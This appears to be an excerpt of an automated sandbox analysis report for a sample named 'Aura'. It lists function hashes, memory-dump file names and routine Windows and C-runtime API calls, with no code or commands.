                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 614a027a67b4d8c7b99e8a93ab13915f42d8bdfe41f51b86e876b156072665aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CD15875D002989FDF15CFE8C890AEDBBB5FF49314F28412EE956EB252D630A941CB60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                    • Opcode ID: 0f40d652338f4ab23f7cc1162060fc7e116e9023cf82b7201d9be28e6d094986
                                                                                                                                                                                                                                                    • Instruction ID: d337d1a3c900a8c0fea1d5e1f66e18891e1326485cf8b81371d2237d997f6c97
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f40d652338f4ab23f7cc1162060fc7e116e9023cf82b7201d9be28e6d094986
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B251C272A04702AFDB299F50C991BFEB7E4EF00B10F14452DE94697292D7B1EE40DB90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000A72C5
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A7395
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A73A3
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A73B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$CurrentThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2261580123-0
                                                                                                                                                                                                                                                    • Opcode ID: 2a36bd7d4a4a02d8260172374d619d055f78f11f15eda2f9cdefaff668c16a13
                                                                                                                                                                                                                                                    • Instruction ID: 738cbfb7fbdc51cf4e5c848e0641d817e4812cc42701ef1c31807c6f172eae02
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a36bd7d4a4a02d8260172374d619d055f78f11f15eda2f9cdefaff668c16a13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3141D3B2A003458FDF20DBA4CC417AEB7E4FF46320F158639E81A47692EB34E910CB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,000BD895,?,00000000,-00000008), ref: 000BC082
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000C1E2A
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 000C1E31
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000C1E6B
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 000C1E72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                                                                                                    • Opcode ID: b5a33c6f643dc3eb8053f49d90ff0fdb54d1dbf8687cb4c31b42e76d72077fce
                                                                                                                                                                                                                                                    • Instruction ID: 06c1d796e572fe5854dfdf6f46d3a6794d93cce9360cd291ba52623d74665ae4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5a33c6f643dc3eb8053f49d90ff0fdb54d1dbf8687cb4c31b42e76d72077fce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A218071604215AFAB20AFA98881EEFB7A9FF46364710852DFC19D7153DB31EC108BA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5538d9745ca8b42de707cc957bfd40c67892d2bb354e2e16849096bf814d2a56
                                                                                                                                                                                                                                                    • Instruction ID: b7c5fe5756b61446110c56923377e192255cb59f92f627aa45f374b244f1b2bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5538d9745ca8b42de707cc957bfd40c67892d2bb354e2e16849096bf814d2a56
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB21C071204205AFDB61AF75CC81DEE7BA8FF90364B104925F85997252EB30EC40C7A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 000C31C6
                                                                                                                                                                                                                                                      • Part of subcall function 000BC021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,000BD895,?,00000000,-00000008), ref: 000BC082
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000C31FE
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000C321E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                                                                                                    • Opcode ID: f55de934187ba7135e0f288f9da4307bdc8078496501a36194d95aeb6ea64a3a
                                                                                                                                                                                                                                                    • Instruction ID: 1918f088a776cd08cbd4c260f27df8aa8afe5c9757c5964c1b37ff58ec32b9c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f55de934187ba7135e0f288f9da4307bdc8078496501a36194d95aeb6ea64a3a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F711C0B1521115BFAB2127B55C8ADFF7A9CDF893947104029FA11A2102FFA5DF0086B1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,000CA2EF,00000000,00000001,00000000,?,?,000C4390,?,00000000,00000000), ref: 000CADB7
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,000CA2EF,00000000,00000001,00000000,?,?,000C4390,?,00000000,00000000,?,?,?,000C3CD6,00000000), ref: 000CADC3
                                                                                                                                                                                                                                                      • Part of subcall function 000CAE20: CloseHandle.KERNEL32(FFFFFFFE,000CADD3,?,000CA2EF,00000000,00000001,00000000,?,?,000C4390,?,00000000,00000000,?,?), ref: 000CAE30
                                                                                                                                                                                                                                                    • ___initconout.LIBCMT ref: 000CADD3
                                                                                                                                                                                                                                                      • Part of subcall function 000CADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,000CAD91,000CA2DC,?,?,000C4390,?,00000000,00000000,?), ref: 000CAE08
                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,000CA2EF,00000000,00000001,00000000,?,?,000C4390,?,00000000,00000000,?), ref: 000CADE8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                                                                                                    • Opcode ID: 90c229bbcf8733a3d36c69a1929a95eced0df11a1d5a03f40da9f4b34802b90a
                                                                                                                                                                                                                                                    • Instruction ID: 4c1dff9687642fa186bdfcedae9589db789ced5a05b13fd953782eaf9768c51f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90c229bbcf8733a3d36c69a1929a95eced0df11a1d5a03f40da9f4b34802b90a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF01236601119BFDF621FD5DC04E9E3F66FF05761B004016FD0A86120D7328860DBA1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 000B0507
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000B0516
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 000B051F
                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 000B052C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                    • Opcode ID: 169e4188da9a812297cc4573d50425e379ad34102085b02b150002bf25d83786
                                                                                                                                                                                                                                                    • Instruction ID: 3259bbfe53ca4b0102dde8ebe10b38b9d2cfd5add93ec5b7a8e1bef8f330e646
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 169e4188da9a812297cc4573d50425e379ad34102085b02b150002bf25d83786
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F06274D1120DEBDB00DFB4DA4999EBBF4FF1C200B914996E812E7110EB34AB449B60
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: RDB$@AF
                                                                                                                                                                                                                                                    • API String ID: 0-293929955
                                                                                                                                                                                                                                                    • Opcode ID: bb3f07d3bb2fcabe52b39a1d35e15f1a9833749b2156f1220bab2b88511df349
                                                                                                                                                                                                                                                    • Instruction ID: 09827799f60907410c32fcdc6003198550ce2609f474eab8529e9ba8762932c7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb3f07d3bb2fcabe52b39a1d35e15f1a9833749b2156f1220bab2b88511df349
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2251CDB56082009FD710CF28EC4275BBBE0AB86318F11483DF5899B281E67699098B9B
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,000BB893,?,?,00000000,00000000,00000000,?), ref: 000BB9B7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 815ebdf391f727020e3b87bc72f00b22a3d5ab419ed2f667e6e3ce4884ebc936
                                                                                                                                                                                                                                                    • Instruction ID: 2a4958504dee2c7324615b71e031e606da142762681f39d562d2063f375a4f5e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 815ebdf391f727020e3b87bc72f00b22a3d5ab419ed2f667e6e3ce4884ebc936
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B416A72D00209AFCF15DF98CC81AEEBBB5FF48300F188159FA14A7222D7B5AA50DB51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 000BB475
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                    • Opcode ID: a35ae0d9e00bfe2f494134c9f5eeda7efb123615ec7c672fe05b6ab4898ac19f
                                                                                                                                                                                                                                                    • Instruction ID: 32db476a2875d06eca596df6d8165014d2fdc62051e6ab3c4a02cdf518258495
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a35ae0d9e00bfe2f494134c9f5eeda7efb123615ec7c672fe05b6ab4898ac19f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B312872500619EBCF369F51CC44AEE7BA6FF09314B18425AFC4509222C3B2DDA1DB82
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000AB8B9
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?,?), ref: 000AB8DE
                                                                                                                                                                                                                                                      • Part of subcall function 000B060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,000AF354,00000000,?,?,?,000AF354,000A3D4A,000D759C,000A3D4A), ref: 000B066D
                                                                                                                                                                                                                                                      • Part of subcall function 000B8353: IsProcessorFeaturePresent.KERNEL32(00000017,000B378B,?,?,?,?,00000000,?,?,?,000AB5AC,000AB4E0,00000000,?,?,000AB4E0), ref: 000B836F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: b2fdcf03fe11f4f8ab8c04127e8e1dbf8c6f902eaa2fdb3fc0e00f5d071132e4
                                                                                                                                                                                                                                                    • Instruction ID: 9eb86b20191dc81ca713404af6b8f213245dc5851be4ed8dc687935efbcb1d12
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2fdcf03fe11f4f8ab8c04127e8e1dbf8c6f902eaa2fdb3fc0e00f5d071132e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C217F31D00218EBCF24DFE9D945AEEB7F9AF46710F140419E405AB252DF78AD45CB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 000A2673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 542279536a0036d27df0e529c0007ee66e2ccdcc9ab276fbf6f2792f9ecd7773
                                                                                                                                                                                                                                                    • Instruction ID: 1effca588bd40bf0f953c1500be06014ccfa8e2bdbd728ff2963737d3399ba99
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 542279536a0036d27df0e529c0007ee66e2ccdcc9ab276fbf6f2792f9ecd7773
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2801DFF1604301ABDB14DF28E846B9B7BE4AF48318F11882EF45D8B342E379E804CB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000B060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,000AF354,00000000,?,?,?,000AF354,000A3D4A,000D759C,000A3D4A), ref: 000B066D
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 000A2673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3510888592.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510866003.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510949164.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510967833.00000000000DA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3510987105.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511003796.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511036876.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 3109751735-1158432155
